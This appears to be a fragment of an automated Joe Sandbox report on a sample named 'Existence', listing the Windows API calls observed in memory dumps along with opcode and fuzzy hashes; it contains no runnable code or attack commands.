                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 826366716-0
                                                                                                                                                                                          • Opcode ID: 6c8569473d946528145ee06c7a62a6605bf0b05d06fb679e71b291658b1d2102
                                                                                                                                                                                          • Instruction ID: 720bd494c5227369e430d9d1a67a46c59f4798385ab90d210d1b25e19f709217
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c8569473d946528145ee06c7a62a6605bf0b05d06fb679e71b291658b1d2102
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5617D71208241EFD725DF24C894F6ABBE5BF84308F54859CF0998B292DB35ED46CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0079E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0079D7CD,?), ref: 0079E714
                                                                                                                                                                                            • Part of subcall function 0079E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0079D7CD,?), ref: 0079E72D
                                                                                                                                                                                            • Part of subcall function 0079EAB0: GetFileAttributesW.KERNEL32(?,0079D840), ref: 0079EAB1
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0079ED8A
                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0079EDC3
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079EF02
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079EF1A
                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0079EF67
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3183298772-0
                                                                                                                                                                                          • Opcode ID: 42e096198c02471aaf4630b276bc9bf1a16fab2329aaee60d27140307949fa11
                                                                                                                                                                                          • Instruction ID: 156ff0e273e78dce8a2f38bdcb41ff756c677689f44488d364d2a025237eadcd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42e096198c02471aaf4630b276bc9bf1a16fab2329aaee60d27140307949fa11
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB5175B2508385DBDB24DB90D8959DBB3ECEF84300F00492EF689D3152EF79A6888756
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00799534
                                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 007995A5
                                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 00799604
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00799677
                                                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007996A2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4136290138-0
                                                                                                                                                                                          • Opcode ID: c015232e09b212b4f5be6cf8a4bcf46454d1b9258a8cf960de49319c22271b3c
                                                                                                                                                                                          • Instruction ID: 286f76d621c024048183565179e4206463af246a279275fb62b164561fa4c2c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: c015232e09b212b4f5be6cf8a4bcf46454d1b9258a8cf960de49319c22271b3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B5149B5A00619EFDB14CF68D884EAAB7F8FF88310B15856DEA05DB310E734E911CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007A95F3
                                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 007A961F
                                                                                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007A9677
                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007A969C
                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007A96A4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2832842796-0
                                                                                                                                                                                          • Opcode ID: 0a467055e0b1bc3e03d1ec69bd88b15cd007e27399ec6f69310386c8c286ea67
                                                                                                                                                                                          • Instruction ID: a95a24eb6ee6e0572fbe13de1ec7426b1e2acdc7d7fe18ff11a8a59133c67f02
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a467055e0b1bc3e03d1ec69bd88b15cd007e27399ec6f69310386c8c286ea67
                                                                                                                                                                                          • Instruction Fuzzy Hash: AD514A35A00618EFDB01DF64C885AAABBF5FF49314F048058E949AB362CB39ED51CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 007B999D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 007B9A2D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 007B9A49
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 007B9A8F
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 007B9AAF
                                                                                                                                                                                            • Part of subcall function 0074F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,007A1A02,?,753CE610), ref: 0074F9F1
                                                                                                                                                                                            • Part of subcall function 0074F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00790354,00000000,00000000,?,?,007A1A02,?,753CE610,?,00790354), ref: 0074FA18
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 666041331-0
                                                                                                                                                                                          • Opcode ID: a7aa24119d75cb9c4f1111f97ce38217ded3e99b0d39de02345190b27b93754a
                                                                                                                                                                                          • Instruction ID: 6393f9dc2c7aa8528ee3c5e90b7793331e0e884126cefd9cab107260258165e6
                                                                                                                                                                                          • Opcode Fuzzy Hash: a7aa24119d75cb9c4f1111f97ce38217ded3e99b0d39de02345190b27b93754a
                                                                                                                                                                                          • Instruction Fuzzy Hash: A4515C35604205DFDB11DF68C485ED9BBB0FF09314B15C0A8EA1AAB362D739ED85CB81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 007C766B
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 007C7682
                                                                                                                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 007C76AB
                                                                                                                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,007AB5BE,00000000,00000000), ref: 007C76D0
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 007C76FF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3688381893-0
                                                                                                                                                                                          • Opcode ID: 183d12748a35b1eccb3da46892856f110188f9c01f29bd35c85f2d66bb9dd70d
                                                                                                                                                                                          • Instruction ID: d6d9e7ca7cd3488f4e7a3c8503bda1e24a1fa87bf3f192db37d9ecf1cbc63e46
                                                                                                                                                                                          • Opcode Fuzzy Hash: 183d12748a35b1eccb3da46892856f110188f9c01f29bd35c85f2d66bb9dd70d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2241AD35A08504AFD729CF2CCC48FAA7BA5EB09360F15426CF819B72E0DB78AD51DE50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: c66d2c5e940df5ea29dfee0787c467e0c54b14be91259bd4482d27a8b8c61aee
                                                                                                                                                                                          • Instruction ID: acbc4927ac62220a2904679b4055bfe7c44c13fa0acedcfcad18eb1f6d41048a
                                                                                                                                                                                          • Opcode Fuzzy Hash: c66d2c5e940df5ea29dfee0787c467e0c54b14be91259bd4482d27a8b8c61aee
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7341E472A006009FDB20DF78C884A5DB7E1EF89314F154568E916EB352EB39AD02CB81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetInputState.USER32 ref: 007A4310
                                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 007A4367
                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 007A4390
                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 007A439A
                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A43AB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2256411358-0
                                                                                                                                                                                          • Opcode ID: b0c42e62d9dbd1c0af3e10e3a7e8980bc750ca615ae33772537c6dfd0867db82
                                                                                                                                                                                          • Instruction ID: d8ffa8e07e73a72f64b1557e499167159edf269ad27a464c7cb5dd49109aabdd
                                                                                                                                                                                          • Opcode Fuzzy Hash: b0c42e62d9dbd1c0af3e10e3a7e8980bc750ca615ae33772537c6dfd0867db82
                                                                                                                                                                                          • Instruction Fuzzy Hash: F6319070504246DEEF34CB64D84DFB67BA8BBC2304F04466DD462921A0E3EE9845CB25
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00792262
                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 0079230E
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00792316
                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00792327
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0079232F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                                                          • Opcode ID: 68c952313ba562a089535532f7fc3806ccd2db25317f85fd8c2f4a4871298392
                                                                                                                                                                                          • Instruction ID: c2c98fdca5d5520b1446dd5021b1416b6554f2f891f067645df1ca7866e0c811
                                                                                                                                                                                          • Opcode Fuzzy Hash: 68c952313ba562a089535532f7fc3806ccd2db25317f85fd8c2f4a4871298392
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D31CD72900219EFDF10DFA8DD88A9E3BB5FB04315F118229F921A72D1C378AD41CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007C61E4
                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 007C623C
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C624E
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C6259
                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 007C62B5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 763830540-0
                                                                                                                                                                                          • Opcode ID: e9102d0c8fa600f8363b4dda244b9eabe996c741be22191f444be5dd5ef28716
                                                                                                                                                                                          • Instruction ID: 318448d82cb7b711e5271ea02a3c399a873349c9c6117f09177b4650826e788c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e9102d0c8fa600f8363b4dda244b9eabe996c741be22191f444be5dd5ef28716
                                                                                                                                                                                          • Instruction Fuzzy Hash: F82196759002589BDB219F54CC88FEEB7B8FF44314F10821EF925EA180D7789985CF50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 007B13AE
                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 007B13C5
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 007B1401
                                                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 007B140D
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 007B1445
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4156661090-0
                                                                                                                                                                                          • Opcode ID: 4fd377cb2b01c7ff989f4d85e0e1b94c3601cf20a1d7dba8616c1f9125da5fba
                                                                                                                                                                                          • Instruction ID: 8d3192c68937db927f4d18858b4732d30eaccd6943423cfad5e6a29851970360
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fd377cb2b01c7ff989f4d85e0e1b94c3601cf20a1d7dba8616c1f9125da5fba
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD218E76600204EFD714EF65C898E9EB7F5EF89340B04843DF85AA7752DA38AC40CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0076D146
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0076D169
                                                                                                                                                                                            • Part of subcall function 00763B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0076D18F
                                                                                                                                                                                          • _free.LIBCMT ref: 0076D1A2
                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0076D1B1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                                          • Opcode ID: beafea40b5a39edc17bf77386a06e6ad19bdee81cee71a4799704bdfbe7df36b
                                                                                                                                                                                          • Instruction ID: caf0416af120d9e8b64d1170f32f16f984de2a44a1c86bad7bfc6ebf3a1c86aa
                                                                                                                                                                                          • Opcode Fuzzy Hash: beafea40b5a39edc17bf77386a06e6ad19bdee81cee71a4799704bdfbe7df36b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E01D472F1161DBF333526769C8CC7B6B6EDEC3BA131A012DFC0AC6240DAA88C0181B0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(0000000A,?,?,0075F64E,0075545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00763170
                                                                                                                                                                                          • _free.LIBCMT ref: 007631A5
                                                                                                                                                                                          • _free.LIBCMT ref: 007631CC
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 007631D9
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 007631E2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                          • Opcode ID: ae46f1c80bcdfff1be1398c01db1e9f3bf6ff2d5c6cb7b55e20efe11c2c4da6b
                                                                                                                                                                                          • Instruction ID: b686dd7c49fd7ea8e35dcc121d9cfef90f3948033a3cd99ad5c83f3f0e6af4dd
                                                                                                                                                                                          • Opcode Fuzzy Hash: ae46f1c80bcdfff1be1398c01db1e9f3bf6ff2d5c6cb7b55e20efe11c2c4da6b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5501F472644E04AB962627349C8DE6B266DAFC33B13220528FC27D2182EF6D8E02C124
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
